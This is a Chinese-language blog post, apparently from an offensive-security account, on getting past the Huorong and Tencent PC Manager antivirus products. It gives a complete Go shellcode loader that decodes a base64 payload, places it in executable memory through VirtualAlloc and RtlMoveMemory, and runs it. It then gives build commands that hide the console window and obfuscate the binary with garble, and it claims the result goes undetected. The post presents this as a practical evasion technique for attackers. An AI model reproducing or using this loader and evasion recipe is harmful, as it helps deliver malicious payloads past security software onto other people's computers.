火绒和电脑管家主要以静态规则为主,但是有时候静态杀起来也挺让人奔溃的,这边分享一下如何拿捏火绒和电脑管家
本文主要介绍如何通过garble进行混淆编译来绕过火绒,garble也可以绕过其他杀软,但是对火绒和电脑管家特别有效果,以火绒为例 下面来对比一下golang原生和garble混淆编译后得差距
来一个很原始的的shellcode loader代码,将原始shellcode base64后就进行加载执行
shellcode loader代码
package main
import (
"encoding/base64"
"log"
"syscall"
"time"
"unsafe"
)
const (
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READWRITE = 0x40
)
var (
kernel32 = syscall.MustLoadDLL("kernel32.dll")
ntdll = syscall.MustLoadDLL("ntdll.dll")
VirtualAlloc = kernel32.MustFindProc("VirtualAlloc")
RtlCopyMemory = ntdll.MustFindProc("RtlMoveMemory")
)
func main() {
b64shellcode:="b64shellcode"
shellcode, err := base64.StdEncoding.DecodeString(b64shellcode)
if err != nil {
log.Fatalln(err)
}
addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
if err != nil && err.Error() != "The operation completed successfully." {
syscall.Exit(0)
}
_, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)))
if err != nil && err.Error() != "The operation completed successfully." {
syscall.Exit(0)
}
time.Sleep(5 * time.Second)
syscall.Syscall(addr, 0, 0, 0, 0)
}golang原生编译
编译命令
go build -ldflags "-s -w -H=windowsgui" test.go不出意外,直接编译出来的静态被杀了
garble 编译
在go环境下安装garble很简单,直接命令行下执行
go install mvdan.cc/garble@latest然后使用garble进行编译
编译命令:
garble build -ldflags "-s -w -H=windowsgui" test.go可以看到火绒一点反应都没有
感兴趣的话扫描二维码进行关注,后续会不断更新攻防实战技巧、免杀技巧以及一些新的技术